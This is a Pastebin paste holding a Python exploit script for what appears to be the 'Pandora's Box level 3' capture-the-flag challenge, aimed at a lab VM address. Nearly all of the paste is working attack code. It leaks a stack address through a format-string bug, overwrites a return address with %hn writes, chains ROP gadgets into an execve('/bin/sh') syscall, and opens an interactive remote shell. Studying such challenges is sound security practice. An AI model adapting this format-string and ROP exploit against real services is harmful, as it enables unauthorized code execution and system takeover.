Guest User

Pandoras Box level3

a guest
Sep 17th, 2015
1,109
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # A slightly different approach than used here http://jellevergeer.com/pandoras-box-level-3/
  2. #
  3. # This approach is different and avoids dealing the stack cookies
  4. # Enjoy
  5.  
  6. import struct
  7. import socket
  8. import telnetlib
  9.  
  10.  
  11. REMOTE = '192.168.56.101'
  12. # REMOTE = '127.0.0.1'
  13. PORT   = 44101
  14.  
  15. mysocket = socket.socket()
  16. mysocket.connect((REMOTE, PORT))
  17.  
  18. # Obtain a leaked stack address
  19. mysocket.send('9999%08x' + '\n')
  20.  
  21. # Ensure all response data is returned
  22. while True:
  23.     data = mysocket.recv(1024)
  24.     addr_loc = data.find('9999')
  25.     if addr_loc is not -1:
  26.         break
  27.  
  28. addr = data[addr_loc+4:addr_loc+12]
  29. print "leaked stack address is " + addr
  30.  
  31. # Calculate offsets for the return address of the function "start_game"
  32. start_game_addr = int(addr, 16) - 48
  33. print "start_game address is  " + hex(start_game_addr)
  34.  
  35. # Calculate offset for the future "/bin/sh" string sent next
  36. bin_sh_addr = int(addr, 16) + 278
  37. print "bin_sh address is  " + hex(bin_sh_addr)
  38.  
  39. sploit = '9999'
  40.  
  41. sploit += struct.pack('<L', start_game_addr)        # Offsets for 0x080485af (start_game)
  42. # sploit += struct.pack('<L', 0xCCCCCCCC)       # Debug values
  43.  
  44. sploit += struct.pack('<L', start_game_addr + 2)    # Offsets for 0x080485af (start_game+2)
  45. # sploit += struct.pack('<L', 0xDDDDDDDD)       # Debug values
  46.  
  47. # Change return address from start_game to ROP bootstrap
  48. sploit += '%33521x%11$hn'               # 0x080a8308 - add esp,0x10c; ret
  49. sploit += '%34050x%12$hn'               # 0x080a8308 - add esp,0x10c; ret
  50.  
  51. sploit += '\x41' * 0xba                 # Padding because above we moved 0x10c 'up' the stack
  52.  
  53. # Zero eax
  54. sploit += struct.pack('<L', 0x0809807f)         # xor eax,eax; ret
  55.  
  56. # Zero ecx + set ebx with addr of '/bin/sh'
  57. sploit += struct.pack('<L', 0x080540cd)         # pop ecx; pop ebx; ret
  58. sploit += '\x00' * 4 + struct.pack('<L', bin_sh_addr)   # Address of /bin/sh
  59.  
  60. # Zero edx
  61. sploit += struct.pack('<L', 0x080540a6)         # pop edx; ret
  62. sploit += '\x00' * 4                    # set edx to 0
  63.  
  64. # Set eax to 11 (syscall for execve)
  65. # sploit += struct.pack('<L', 0xEEEEEEEE)       # Debug value
  66. sploit += struct.pack('<L', 0x0806ad3e) * 5     # inc eax; inc eax; ret
  67. sploit += struct.pack('<L', 0x0806ad3f)         # inc eax; ret
  68. sploit += struct.pack('<L', 0x08054820)         # int 0x80; ret
  69.  
  70. # And finally the '/bin/sh' string
  71. sploit += '////////////////bin/sh\x00'          # Padding then null terminated '/bin/sh'
  72.  
  73. # Bombs away
  74. mysocket.send(sploit)
  75.  
  76. # Drop into a interactive shell
  77. tn = telnetlib.Telnet()
  78. tn.sock = mysocket
  79. tn.interact()
RAW Paste Data